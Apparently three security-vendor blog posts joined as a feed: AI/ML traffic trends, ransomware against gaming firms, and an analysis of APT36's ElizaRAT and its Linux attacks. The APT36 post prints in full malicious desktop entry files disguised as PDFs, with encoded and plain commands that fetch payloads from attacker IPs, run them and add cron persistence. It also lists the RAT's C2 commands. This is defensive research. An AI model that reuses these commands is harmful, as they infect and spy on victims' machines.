How ChatGPT, and similar generative AI modules like GPT-3 and GPT-4, operate within the realm of AI applications has garnered significant attention in recent years. While AI has been in development for decades and encompasses a diverse range of technologies, LLMs have gained prominence relatively recently due to their remarkable ability to generate human-like text.2
AI/ML Usage Trends
AI Usage Soars Then Stabilizes
From April to June of this year, we observed a consistent upward trajectory in AI/ML usage and traffic. However, since August, there has been a gradual decline in activity since then, reflecting the dynamic nature of AI trends.
Figure 1: A graph illustrating the sharp rise of AI traffic and sudden stabilization.
AI’s Transformation of Manufacturing
The manufacturing industry emerged as a key driver of AI/ML traffic, offering a compelling glimpse into the rapid advancements made during the Industry 4.0 era3. This sector’s engagement highlights the pivotal role of AI and ML in shaping the future of manufacturing. Besides manufacturing, the following industry verticals stood out:
- Finance
- Technology
- Services
Figure 2: A breakdown of the top AI/ML traffic producers by industry.
As evident from the data presented, a significant portion of the observed transactions originates from the manufacturing sector, predominantly featuring applications like ChatGPT, Drift, and Pypestream. Simultaneously, the finance sector holds a substantial share, accounting for 17.2% of the transactions, driven primarily by the adoption of ChatGPT and Drift. Irrespective of the industry vertical, ChatGPT, Drift, and LivePerson emerge at the frontrunners in terms of popularity among generative AI-powered applications. Drift is an AI powered conversational tool that integrates with email and chat. While LivePerson is also an AI powered service for customer interaction.
Figure 3: A graph showing usage over time by industry.
ChatGPT, Driving Force Behind OpenAI.com Popularity
Unsurprisingly, OpenAI.com emerged as the dominant player, accounting for a substantial share of our observed transactions, approximately 36% in total. Interestingly, within this substantial figure, a noteworthy 58% can be attributed to ChatGPT-related traffic. This data indicates the important role of OpenAI.com in facilitating a significant portion of our transactions, with ChatGPT serving as a key driver of engagement and activity on the platform. After OpenAI.com, the top domains are:
- drift.com
- ada.support
- Quillbot.com
Figure 4: A breakdown of the top AI/ML-related domains.
Drift Takes Lead in Language Processing
The foremost AI/ML language processing application in use is Drift, leading the pack, with ChatGPT and LivePerson closely following suit. A significant focus among users revolves around language processing tools employing LLMs. The overarching goal centers on enhancing automated user interactions, as evidenced by widespread adoption in chatbot integration, in-hour writing tool utilization, and speech-to-text applications.
Figure 5: A breakdown of the most popular language processing AI applications.
ChatGPT Usage Trends
ChatGPT Usage Sharply Rises Then Plateaus
Our analysis reveals a notable pattern in ChatGPT usage. From May to June, we observed a sharp and noteworthy surge in ChatGPT-related transactions, followed by gradual ascent that extended until August. However, it is in this month that we witnessed a leveling off, marking a plateau in its usage, mirroring the broader trends evident in overall transaction patterns within the AI/ML traffic landscape.
Figure 6: A graph showing the increase and then plateau of ChatGPT usage.
ChatGPT’s Impact Across Top Verticals
ChatGPT finds its most significant application and impact across a spectrum of key verticals, including manufacturing, finance, services, technology, and the energy sector. These diverse industries have integrated ChatGPT to enhance their operations, decision-making, and customer interactions.
Figure 7: A breakdown of the top ChatGPT users by industry.
Mirroring the broader AI/ML transaction trend, we observed a steep rise from May to June, followed by a sustained level of activity until August. However, it’s worth noting that while transactions related to AI/ML show a decline across various verticals, the finance sector stands out with a continuous rise since June.
Figure 8: A graph depicting the rise and stabilization of ChatGPT in various sectors, except for finance - where ChatGPT has grown since June.
Trends by Location
The primary sources of traffic come from the United States, India, and the United Kingdom where ChatGPT, Drift, and LivePerson emerge as the top AI applications in use. This observation strongly reinforces our suggestion that, regardless of industry or national borders, language processing remains the foremost use case for generative AI applications. Across diverse verticals and geographies, the transformative impact of AI-powered language processing continues to shape AI adoption and innovation.
Figure 9: A breakdown of the countries that generate most of the AI/ML-related traffic.
Securing AI/ML Transactions
Significantly, the majority of AI/ML-related transactions undergo thorough scrutiny so 10% of all AI/ML-related transactions are blocked using URL filtering policies. The technology sector takes the lead in blocking AI/ML transactions, closely followed by the finance and manufacturing sectors.
Figure 10: A breakdown of which industries are blocking the most AI/ML-related transactions.
Drift holds the unique distinction of being both the most used and most frequently blocked application.
Figure 11: A pie chart showing how the overwhelming majority of blocked AI/ML transactions originate from Drift - a conversational AI application.
AI/ML Best Practices Guide
Considering the rapid advancement and adoption of AI-powered applications, it is crucial to establish and follow best practices to ensure the responsible and secure use of these transformative technologies.
- Organizations must proactively adapt their AI usage and security policies to stay ahead of potential risks and challenges.
- Recognize that AI-powered applications come with risk and continually assess and mitigate risks to protect intellectual property, personal data, and customer information.
- Ensure that the use of AI tools complies with all relevant laws and ethical standards. This includes data protection regulations and privacy laws.
- Establish clear accountability for the development and deployment of AI tools. Define roles and responsibilities within your organization to oversee AI projects.
- Maintain transparency when using AI tools, Justify their use and communicate their purpose clearly to stakeholders.
Guidelines
- Do not provide non-public information, personally identifiable information (PII), proprietary company data, or any confidential information to AI models.
- AI cannot replace a human being. It should not be used to make decisions without appropriate human intervention.
- AI-generated content should not be used without human review and approval, especially in cases where the content represents your organization.
- The development and integration of AI tools should follow a Secure Product Lifecycle Framework to guarantee the highest level of security.
- Perform thorough product due diligence before implementing AI solutions. Make sure to evaluate their security and ethical implications.
Conclusion
From the release of ChatGPT and the prominence of AI-powered applications like Drift, to the pivotal role of LLMs and the services hosted on OpenAI.com, we’re witnessing a dynamic AI revolution. The global interest, particularly from the United States and India, in generative AI applications highlights the transformative possibilities these technologies bring. As exciting as these changes are, it’s important to incorporate best practices and guidelines into your AI/ML strategy to ensure the responsible and ethical use of such AI-powered applications. As the technological landscape continues to shift, it’s essential to remain vigilant, responsible, and adaptive as we utilize AI/ML to shape the future. Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
1 https://cset.georgetown.edu/article/what-are-generative-ai-large-language-models-and-foundation-models/
2 https://www.businessinsider.com/everything-you-need-to-know-about-chat-gpt-2023-1
3 https://www.mckinsey.com/featured-insights/mckinsey-explainers/what-are-industry-4-0-the-fourth-industrial-revolution-and-4ir
Tue, 26 Sep 2023 13:49:49 -0700Deepak Shankerhttps://www.zscaler.com/blogs/security-research/analysis-generative-ai-trends-and-chatgpt-usageRansomware Attacks on Gaming Industry - A CISO Perspective
https://www.zscaler.com/blogs/security-research/ransomware-attacks-gaming-industry-ciso-perspective
Introduction
The gaming industry is experiencing a surge in cyber attacks because of its vast reservoirs of sensitive customer information, financial transactions, and interconnected operations. Zscaler’s ThreatLabz threat research team reported earlier this year that ransomware attacks had grown 37% overall year-over-year, with the average cost of an attack reaching a whopping $5.3M. The Department of Homeland Security recently released a report stating that ransomware groups are on pace for their second most profitable year ever, driven largely by ‘big game hunting’ attacks against large organizations.
In light of the recent ransomware attacks and the growing trend of attacks against the gaming industries, we want to offer a broader analysis of ransomware attacks and trends affecting the gaming industry and give practitioners an informed perspective for how they can safeguard customer trust and data.
Key Takeaways
- The gaming industry is a treasure trove of customer data and transaction details. The nature of the gaming industry requires companies to handle high volumes of customer data and transaction details.
- Social engineering tactics played a prominent role in the most recent gaming cyberattacks. Recent cyberattacks continue to exploit social engineering techniques, but with a notable shift toward phone-based communication instead of email. This approach has proven effective due to lack of awareness and training when compared to email-based spam attacks, which are more familiar and often require education by organizations.
- International law enforcement agencies shut down two of the largest initial access brokers, Emotet and Qakbot, that should potentially reduce ransomware activity worldwide in the near term. The fall of Emotet and Qakbot reduced primary infection vectors that leveraged malicious email attachments and links. However, threat actors are turning to alternative techniques to carry out attacks.
- Minimizing external attack surface, preventing initial compromise, stopping compromised users & insider threats by eliminating lateral movement, and preventing data loss are the four core zero trust tenets for ransomware prevention.
- UNC3944, an affiliate of the BlackCat ransomware threat group, is believed to be responsible for the recent cyber attacks on the gaming industry.
- Ransomware attacks all follow a similar attack sequence. Understanding this attack sequence and employing security controls and strategies leveraging zero trust architecture is the key to an effective defense.
Attack Vectors and TTPs
Ransomware attacks have long been conducted using a variety of techniques including phishing and spam email, brute force attacks, and the exploitation of vulnerabilities. The use of phishing and spam email has long been a primary infection vector for ransomware threat actors and/or initial access brokers. However, two of the largest sources of spam email, Emotet and Qakbot, were disrupted by law enforcement operations. Qakbot in particular was a major player as an initial access broker for ransomware operations including BlackBasta. In recent weeks, ThreatLabz has observed a significant decline in BlackBasta ransomware activity corresponding to the demise of Qakbot. As a result, many ransomware initial access brokers are likely to use alternative techniques and recent attacks on the gaming industry demonstrate how these attacks (at least in the short term) are likely to be carried out. Interestingly, the attacks still continue to leverage social engineering, but rely on speaking over the phone rather than through email. This tactic has been used in prior attacks and appears to be increasingly effective because there is a lack of education, in contrast to spam, which is better understood and often requires mandatory training at many organizations.
Although spam was not used in some recent attacks, the end goal is the same: to compromise a target environment, perform lateral movement to obtain access to an administrator’s account, exfiltrate sensitive information, and (optionally) deploy ransomware. ThreatLabz has observed the latter being used less frequently in attacks in so-called encryption-less extortion attacks. Many of the extortion-less attacks have been targeted at multi-billion dollar companies with the intent to reduce the impact and disruption associated with file encryption. In May 2023, the Clop ransomware group leveraged a supply-chain style attack targeting a zero-day vulnerability in the MOVEit Transfer application enabling the group to access and steal sensitive information from hundreds of organizations. That information was then leveraged to extort victims into paying a ransom.
The Securities and Exchange Commission (SEC) has adopted rules that will require public companies to disclose material cybersecurity incidents in a standalone item on Form 8-K within four business days, which rules will become effective in December 2023. This change may have an impact on ransomware negotiations and possibly lead to a reduction in the number of companies that today pay ransoms to avoid public disclosure of a breach and the corresponding release of stolen information. To learn more about the SEC’s cybersecurity ruling and how it impacts public companies, visit The Impact of the SEC’s New Cybersecurity Policies.
Suspected Threat Actors
UNC3944 has taken over ransomware news headlines with multiple high-profile attacks against casinos.
A financially-motivated threat group that has been active since May 2022, UNC3944 (a.k.a. Scattered Spider, Muddled Libra, 0ktapus, and Scatter Swine). According to a Reuters report, UNC3944 is believed to be composed primarily of young adults from the United States and United Kingdom. Their early attacks were waged against telecommunications organizations using techniques such as SIM swap scams, multi-factor authentication fatigue attacks, and SMS phishing.
More recently, UNC3944 has become an affiliate group for BlackCat/ALPHV ransomware - a notorious malware family called out as one of the top 5 ransomware families in our 2023 ThreatLabz State of Ransomware Report.
BlackCat was the second most prolific ransomware group performing double extortion attacks of the past year; only LockBit was responsible for more data leaks. The BlackCat group is a sophisticated RaaS operation that has been active since November 2021 (after previously being branded as DarkSide and BlackMatter), and is known to leverage affiliates that use a variety of methods to infiltrate victim networks, including exploiting known vulnerabilities, phishing attacks, and social engineering. Once inside a network, BlackCat operators typically use a combination of tools and techniques to move laterally, escalate privileges, and exfiltrate data. The group then deploys its ransomware payload, which encrypts the victim’s files.
Hackers Leverage Multiple Trending Techniques
The UNC3944 attacks underscore three major trends that ThreatLabz has reported in our research:
Ransomware-as-a-service: Many of the most popular and damaging ransomware families of the last year are able to scale their profits and operations using a Ransomware-as-a-Service (RaaS) model. In this model, ransomware groups outsource the infiltration, lateral movement, data theft, and ultimate deployment of their ransomware payload in exchange for a commission.
Double extortion: In double extortion ransomware attacks, threat actors not only encrypt data on the victims’ systems, but also exfiltrate it and threaten to publish it if ransoms are not paid. In 2021, ThreatLabz observed 19 ransomware families that adopted double or multi-extortion approaches to their cyberattacks. This has since grown to 44 ransomware families observed. The data extortion component of the attack has become so profitable that many threat families are now waging encryption-less ransomware attacks in which they do not even bother to encrypt data, but instead focus entirely on stealing data. These encryption-less ransomware attacks have the side benefit of attracting less attention from authorities because they do not disrupt business operations, yet are still extremely effective at generating ransom payments.
Social engineering as a method of compromise: UNC3944 frequently leverages social engineering tactics in order to compromise systems. Many of their recent attacks began with phishing that enabled them to steal credentials and gain access to systems without triggering security controls.
How to Defend Against Ransomware Attacks
Ransomware attacks (and all cyberattacks, generally) all follow a similar sequence. In order to stop these attacks consistently, your security strategy should aim to disrupt as many stages of this attack chain as possible, which maximizes your chances of stopping the attack even if the threat actors should evade some of your security controls. The stages of the attack sequence are as follows:
Figure 1: Ransomware attack sequence
1. Reconnaissance: Many ransomware attacks—especially ones targeted to large organizations—are extremely well-researched. Threat actors find out all the information that they can about your company, including who works there, what infrastructure is exposed to the internet, what applications are in use, and where you likely keep your most sensitive information. A key tactic to disrupt reconnaissance is to make yourself hard to find and hard to exploit.
Key tips:
- Remove vulnerable, routable appliances such as VPNs and north-south firewalls, in favor of more modern options for secure access.
- Hide your key applications behind a proxy architecture so that they can’t be exploited.
- Keep software and devices up-to-date with the most recent versions and security patches.
- Identify and remediate misconfigurations and oversharing in cloud storage that may lead to discoverable data.
2. Compromise: Once a threat actor maps out their attack plan, they will need to compromise your organization. This could be through phishing, brute force, or through an exploit of a vulnerability. Putting robust inline security controls in place to deeply inspect traffic and block malicious files and behaviors is critical.
Key tips:
- Inspect as much traffic as possible—including encrypted traffic, as attackers utilize encrypted channels in more than 85% of attacks.
- Utilize layered AI-powered security controls, including inline sandboxing, to stop never-before-seen threats. Attackers spin up new infrastructure extremely rapidly; the average phishing page is only 13 hours old. Relying on blocklists that only get updated every 12-24 hours is not good enough.
- Only allow access to your crown jewel applications from managed devices, and ensure that your security strategy includes device posture checks to protect your sensitive data from attacks that start with credential theft.
3. Lateral movement: When the attacker is in, they’re going to escalate their privileges and perform internal reconnaissance, usually starting with the Active Directory. Ransomware attackers will then propagate their ransomware payloads across your infrastructure in order to encrypt data. Utilize zero trust strategies to minimize access and limit the blast radius of these tactics.
Key tips:
- Use ZTNA to maximize microsegmentation, connecting users only to one application at a time—never the network.
- Ring-fence your applications with deceptive decoys that lure and confuse attackers, and that alert your SOC that malicious activity is underway.
4. Data theft: In double extortion or encryption-less ransomware attacks, the threat actor will find valuable information and exfiltrate it to a command-and-control server or a file sharing site where they can then hold it for ransom.
Key tips:
- Know your data: use AI-powered data classification tools to tag sensitive data and give yourself visibility into its movement.
- Inspect your outgoing traffic—again including encrypted channels—and utilize policies to stop data from leaving sanctioned storage locations.
Ransomware Best Practices and Mitigation
Guarding against ransomware attacks requires a comprehensive approach that tackles every stage of the threat, minimizing potential harm. The Zscaler Zero Trust Exchange offers comprehensive ransomware protection across this entire attack sequence, with best-in-class security controls that are all delivered inline and at the edge. By adopting the following guidelines, you can effectively reduce the risk of falling victim to a ransomware attack.
- Prevent initial compromise: Employ consistent security policies that ensure uncompromising security starting at your source code. By implementing extensive SSL inspection capabilities, browser isolation, inline sandboxing, and policy-driven access control, you can thwart access to malicious websites, block channels of initial compromise and detect unknown threats from reaching your users.
- Stop compromised users and insider threats: Combining inline application inspection and Identity Threat Detection & Response (ITDR) with integrated deception capabilities empowers you to detect, deceive, and effectively stop potential attackers, whether they are external threats or insiders with malicious intent.
- Minimize external attack surface and eliminate lateral movement: Prevent hackers from maneuvering within your network by disconnecting applications from the internet and embracing a zero trust network access (ZTNA) architecture. Directly connecting users to applications, and applications to applications, rather than the network itself, significantly restricts the potential reach of an attack.
- Prevent data loss: Implement inline data loss prevention measures with full TLS inspection and thoroughly inspect data both while in transit and at rest, to effectively stop data theft attempts. Stay one step ahead of threat actors by regularly updating software and providing comprehensive security training.
- Perform frequent audits: Regular cybersecurity audits play a crucial role in enhancing best practices and mitigation tactics. Audits can assess compliance adherence, which is pivotal when refining a cybersecurity strategy for the gaming industry, especially as compliance & regulations change - like the SECs new ruling on cybersecurity. In addition, regular audits can help you identify knowledge gaps in your user training and employee awareness.
- Educate and train your employees regularly: Once knowledge gaps are identified, targeted and custom cybersecurity training programs can be put into place to empower and inform employees. This boosts employee awareness, and teaches them to recognize and respond to threats effectively.
By leveraging the power of the Zscaler Zero Trust Exchange and adopting these best practices, organizations can proactively protect their users, workloads, IoT/OT devices and B2B connectivity, so that valuable data is safe from the ever-evolving threat landscape of ransomware attacks.
Conclusion
Recent ransomware attacks on international gaming companies are picking up speed. Phone-based social engineering tactics exploit knowledge gaps with training blindspots followed by VPN based entry into the environment that is a relatively flat legacy network. Considering the high volumes of customer data and financial transactions processed each day, this industry remains a prime target.
Zscaler recommends all companies that handle sensitive or personal data adopt a proactive approach to cybersecurity countermeasures that continually verify access requests - in other words, a zero trust architecture. The reduction in ransomware attacks due to the demise of Emotet and Qakbot are promising; however, it also highlights how quickly threat actors adapt and turn to other alternatives. Ransomware attacks consistently adhere to a standardized attack sequence. Gaining insight into this attack sequence, and implementing security measures and strategies at multiple junctures is pivotal for achieving an ironclad cybersecurity defense. Zscaler's ThreatLabz team continuously monitors threat intelligence intel and shares its findings with the wider community.
Tue, 19 Sep 2023 13:58:50 -0700Deepen Desaihttps://www.zscaler.com/blogs/security-research/ransomware-attacks-gaming-industry-ciso-perspectiveA peek into APT36’s updated arsenal
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
Introduction
In July 2023, Zscaler ThreatLabz discovered new malicious activity perpetuated by the Pakistan-based advanced persistent threat group (APT36). APT36 is a sophisticated cyber threat group with a history of conducting targeted espionage operations in South Asia. We observed APT36 targeting Indian government sectors using a previously undocumented Windows RAT, new cyber espionage utilities for Linux, new distribution mechanisms, and a new attack vector used against the Linux environment.
In this blog, we will examine the latest tools employed by APT36, which are designed to target both Windows and Linux operating systems.
Key Takeaways
Updated arsenal of APT36: The threat actor has resurfaced with a fresh, fully functional Windows remote administration tool (RAT), novel tools for cyber espionage on Linux systems, innovative distribution methods, and additional attack vectors.
New Windows RAT: A custom RAT, referred to as ElizaRAT, has been incorporated into the APT36 toolkit. ElizaRAT is delivered as a .NET binary and establishes a C2 communication channel via Telegram, enabling threat actors to exert complete control over the targeted endpoint.
Abuse of legitimate services: Legitimate services, such as Google Drive and Telegram, are abused in different stages of the attack chain.
New attack vectors for Linux: APT36 now boasts innovative weaponization of Linux desktop configuration files that target Linux-based endpoints in the Indian government sector.
Deceptive tactics: The threat actor took extensive measures to conceal any link to Pakistan. They chose the infrastructure and artifacts meticulously to make it appear as though the activities were conducted in India.
Reuse of infrastructure: In some cases, the same C2 infrastructure is being used by APT36 for both credential phishing attacks and distributing malicious binaries.
Brief Overview
APT36 is an advanced persistent threat (APT) group which we attribute to Pakistan with very high confidence. This group has been active since 2013 and primarily targets the Indian government, defense, and education sectors.
This group leverages credential harvesting and malware distribution attacks to conduct cyber espionage. APT36 utilizes:
Custom-built remote administration tools targeting Windows
Lightweight Python-compiled cyber espionage tools serving specific purpose targeting Windows and Linux
Weaponized open-source C2 frameworks like Mythic
Trojanized installers of Indian government applications like KAVACH multi-factor authentication
Trojanized Android apps
Credential phishing sites targeting Indian government officials
Analysis of ElizaRAT, the New Windows RAT
We assigned the moniker “ElizaRAT” to this new Windows-based backdoor utilized by APT36 due to the distinctive strings identified within the commands observed during our real-time analysis of the C2 communication channel.
ElizaRAT is distributed as .NET binaries sent inside password-protected archive files hosted on Google Drive links. During our threat analysis, we gathered several samples of ElizaRAT and they all shared these characteristics:
They are all .NET binaries that are compiled as Control Panel applets (CPL) and use the ".cpl" file extension. To the best of our knowledge, we believe this is the first time APT36 has weaponized the CPL file format.
The binaries are large in size - ranging from 4MB to 16MB.
The Costura .NET framework was used to embed the essential .NET assemblies inside the main malware which resulted in the inflation of binary sizes.
The Telegram API was used for C2 communication.
For this technical analysis, we use the following file metadata:
MD5 hash: fc99daa2e1b47bae4be51e5e59aef1f0
Filename: AgendaMeeting.cpl
Since this Windows RAT arrives on the endpoint in the form of a Control Panel applet, the first method called upon execution is CplApplet().
This method transfers control to Program().Main() which in turn invokes an asynchronous task - MainAsync(). Inside this task, all important malicious operations are carried out.
The image below shows Program().Main() kick starting the malicious activities on the endpoint.
Figure 1: The MainAsync() method used to start the malicious activities on the endpoint.
Some of the key operations performed by ElizaRAT are:
Initializes the Telegram bot with Communicate.ConnectMe() using the built-in Telegram bot token and sets it up in polling mode to receive commands from the threat actor.
Creates a directory: %appdata%\TextSource
Generates a UUID and username specific to the infected machine.
Drops and displays a decoy PDF file to the user.
Sets up persistence on the machine.
Fetches details on antivirus softwares running on the machine and sends the information to the attacker-controlled Telegram bot.
In the following sections, we dive deeper into some of these operations.
Logging Operation
Each execution result is logged on both the endpoint (client-side) and the Telegram bot (server-side).
The code below shows that logging is done at the local and remote level.
// remote logging in Telegram bo
await Communication.send_message("Username Created with name : "
+ TextSource.Settings._username);
// local logging on the infected endpoint
File.AppendAllText(TextSource.Settings.log_p, "username created
local\n");
Unique Identifier Generation
A UUID and username are generated for each infected machine so that the threat actor can uniquely identify the victim. It uses Windows Management Instrumentation (WMI) to fetch the processorID and UUID of the machine, and uses both these details to generate a UUID and username specific to the infected machine
The only difference between the generated UUID and the username is the ".cookie" extension. The username is the UUID without the ".cookie" extension.
The image below shows the relevant code used to generate these values.
Figure 2: The getusername() method used to generate the UUID and username to identify the infected machine.
C2 Command Format
Since the threat actor uses the same Telegram bot to manage multiple infected endpoints, they use a specific C2 command format to synchronize the operations and ensure that a given command executes only on the intended endpoint.
The C2 command format looks like this:
<command>*<username>*<arguments>
C2 Commands
All C2 commands are handled in a switch-case statement by the Bot_OnMessage() method inside the Communicate class. Before the execution of any command, the RAT extracts the username from the C2 command and compares it with the infected machine's username. The command is executed successfully only if both the values match.
The following C2 commands are supported by the bot:
Table 1: C2 commands supported by Telegram bot
C2 COMMAND
FUNCTIONALITY
/dir
Fetches the list of files in the specified directory.
/upload
Uploads the specified file from the victim’s machine.
/getprocess
Gets the list of processes running on the victim’s machine. The list is returned in a file with the name getproc.dll .
/run
Executes the specified program on the victim’s machine.
/delete
Deletes the specified file.
/end
Kills the specified processes on the victim’s machine.
/online
Checks whether the infected machine is online.
/identity
Connects to the specified website from the victim’s machine and sends a response to the threat actor. This can be used to fetch the machine’s IP address by supplying a parameter like hxxps://api.ipify[.]org .
/ping
Checks internet connectivity from the victim’s machine to the specified website.
/scr
Takes a screenshot of the victim’s machine and sends it to the threat actor in a file named scr.dll .
/createdir
Creates a directory on the user’s machine.
Persistence
In order to achieve persistence on the infected machine, the bot creates a Windows shortcut file (LNK) in the Windows Startup directory.
The image below shows the code used to create this shortcut file. The name of the shortcut file is fetched from the "orig_name" setting defined in the config. In this case, the shortcut file is called TextSource.lnk.
Figure 3: The buildforts() method used to create a Windows shortcut file in the Startup directory for persistence.
The description of this shortcut file is set to "Text Editing APP for Windows" to disguise it as a text editing application, making it seem innocuous. In addition, the target command line is set to execute the Control panel applet using rundll32 .
Displaying Decoy Content
The method dosome() defined in the Program class is responsible for displaying the decoy PDF file to the user. This decoy file is present inside the resources section of the .NET binary.
The image below shows the decoy file. It is only used to distract the victim and make it appear that an error occurred when opening the file.
Figure 4: Decoy PDF file displayed to the user.
Malicious Linux Desktop Entry Files as New Attack Vectors
The utilization of Linux desktop entry files by APT36 as an attack vector has never been documented before. This attack vector is fairly new and appears to be utilized in very low-volume attacks. So far, our research team has discovered three samples - all of which have 0 detection on VirusTotal.
We first observed an occurrence in May 2023 when a credential phishing website used to target Indian government employees was also found to be hosting a redirector to distribute ZIP archives containing malicious Linux desktop entry files.
National Informatics Center (NIC), India Phishing Attack - May 2023
In May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by masquerading as the official login portal for National Informatics Center (NIC), India. We notified NIC in May 2023 about this website and the associated threat intel.
We also noticed that the same phishing website was using the hxxps://email9ov[.]in/VISIT_OF_MEDICAL URL to redirect visitors to the hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.zip URL.
From here, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.
Here are some technical details about this case:
ZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434
ZIP filename: Delegation_Saudi_Arabia.zip
Desktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac
Desktop entry filename: Delegation_Saudi_Arabia.desktop
Desktop entry file analysis
We found the following content in the desktop entry file:
[Desktop Entry]
Encoding=UTF-8
Name=Delegation_Saudi_Arabia.pdf
Exec=sh -c "echo 'L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1R
yaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8g
L3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2
h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3It
bWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1
LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLn
BkZiB8IC4vMTg1LmVsZg==' | base64 -d | sh"
Terminal=false
Type=Application
Icon=x-office-document
The icon of this desktop entry file is set to "x-office-document" to seem like an innocent Office document.
The base64-encoded command present inside the desktop entry file decodes to:
/usr/bin/wget 'hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget 'hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185
The command decoded above performs the following actions:
1. Downloads the decoy PDF and saves it in the /tmp directory with the filename: Delegation_Saudi_Arabia.pdf .
2. Downloads the Linux payload and saves it in the /tmp directory with the filename: 185.elf .
3. Marks the Linux binary as executable.
4. Uses LibreOffice to open and display the decoy PDF file.
5. Executes the Linux payload.
In this case, the Linux payload was a cross-platform binary designed to run on both Linux and WSL (Windows Subsystem for Linux) machines. Since it did not contain a fully functional C2 mechanism at the time of analysis, we believe it was still in a development phase and used by the threat actor as an initial test.
To read about “Lee” agent’s cross-platform capabilities, visit the Lumen blog.
The content inside the decoy PDF file is displayed in the image below.
Figure 5: Decoy PDF displayed to the user.
The PDF appears to be a document from the Indian Ministry of Defence describing the visit of nine members of a delegation from Saudi Arabia, where they discussed issues with Indian Armed Forces medical officials.
Inflated File Attack - June 2023
Beginning in June 2023, we detected APT36 establishing their operational infrastructure on a server with the IP address 153.92.220.59. The threat actor proceeded to register multiple domains hosted on this IP. Further insight into this attacker-controlled infrastructure is available in the Threat Actor Infrastructure section.
In August, we noted a significant development where few of these domains served as the hosting platform for decoy PDF files. These PDFs were linked within the malicious Linux desktop entry files, which the threat actor distributed enclosed in zip archives.
Here are some technical details about this case:
ZIP archive MD5 hash: 36b19ca8737c63b9c9a3365ff4968ef5
ZIP filename: Meeting_agenda.zip
Desktop entry file MD5 hash: 65167974b397493fce320005916a13e9
Desktop entry filename: approved_copy.desktop
Desktop entry file analysis
The first anomaly we observed was the large size of the Linux desktop entry file. A size larger than 1 MB for a Linux desktop entry file is rare. Reviewing the file revealed that the threat actor inflated the size of the file by adding more than a million "#" characters. We believe this was an attempt by the threat actor to bypass security scanning solutions.
The image below shows the extra characters added to the inflated Linux desktop entry file.
Figure 6: The inflated Linux desktop entry file.
The relevant content from the Linux desktop entry file is shown below.
[Desktop Entry]
Type=Application
Name=approved_copy.pdf
Exec=bash -c "xdg-open 'https://admin-dept[.]in//approved_copy.pdf' && mkdir -p ~/.local/share && wget 64.227.133[.]222/zswap-xbusd -O ~/.local/share/zswap-xbusd && chmod +x ~/.local/share/zswap-xbusd; echo '@reboot ~/.local/share/zswap-xbusd'>>/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt; ~/.local/share/zswap-xbusd"
Icon=application-pdf
Name[en_US]=approved_copy.desktop
This desktop file performs these main operations:
Downloads the decoy PDF file from the https://admin-dept[.]in/approved_copy.pdf URL and displays it to the victim. This decoy file contains an error message to distract the user. Figure 7 shows that the icon of this desktop file is set to application-pdf which is done to disguise the malware as an innocuous file.
Creates a hidden directory path called, local/share, in the user's home directory.
Downloads the Linux payload from the URL 64.227.133[.]222/zswap-xbusd using wget. Saves it as zswap-xbusd in the previously created hidden directory.
Writes a short shell script to the file /dev/shm/myc.txt. The shell script reboots the machine and then launches the Linux payload.
Sets up a cron job under the current username to run the contents of the /dev/shm/myc.txt script.
Deletes the shell script.
Executes the Linux payload.
Figure 7: The icon of the desktop configuration file is set to PDF to make it more convincing.
At the time of our analysis, the server 64.227.133[.]222 was not serving the Linux payload. We continued monitoring this infrastructure and noticed that on Aug 29, 2023, a new domain called admin-br[.]in was registered and used to distribute a new Linux desktop entry file. In this instance, we were able to retrieve the payloads and conclude the threat attribution to APT36.
Here is metadata from the new Linux desktop entry file:
MD5 hash: 574013c4a22ca2d8d8c76e65ef5e8059
Filename: approved_copy.desktop
The relevant content from the Linux desktop entry file is shown below.
[Desktop Entry]
Type=Application
Name=approved_copy.pdf
Exec=bash -c "xdg-open 'https://admin-br[.]in//approved_copy.pdf' && mkdir -p ~/.local/share && wget 64.227.138[.]127/4200f0916f146d2ac5448e91a3afe1b3/pickle-help -O ~/.local/share/pickle-help && chmod +x ~/.local/share/pickle-help;~/.local/share/pickle-help >/dev/null 2>&1 & sleep 5; wget 134.209.159[.]9/4200f0916f146d2ac5448e91a3afe1b3/ziputils-help -O ~/.local/share/ziputils-help && chmod +x ~/.local/share/ziputils-help; echo '@reboot ~/.local/share/ziputils-help'>>/dev/shm/myc.txt;echo '@reboot ~/.local/share/ziputils-help'>>/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt;~/.local/share/ziputils-help &"
Icon=application-pdf
Name[en_US]=approved_copy.desktop
The functionality of this file is similar to the previous Linux desktop entry file.
The image below shows a decoy PDF file displaying an error message stating “Failed to load the PDF document”. This is used to distract the user while malicious activities occur in the background.
Figure 8: The decoy PDF file displayed to the user.
In this case, the Linux desktop entry file retrieves the malicious Linux payloads from the servers at:
64.227.138[.]127
134.209.159[.]9
The two files retrieved are cleverly named to disguise themselves as legitimate software utilities.
Here is the metadata of Linux payloads:
MD5 hash: 98279047a7db080129e5ec84533822ef
Filename: pickle-help
MD5 hash: 248d4e6bb0f32afd7a1cfb975910235a
Filename: ziputils-help
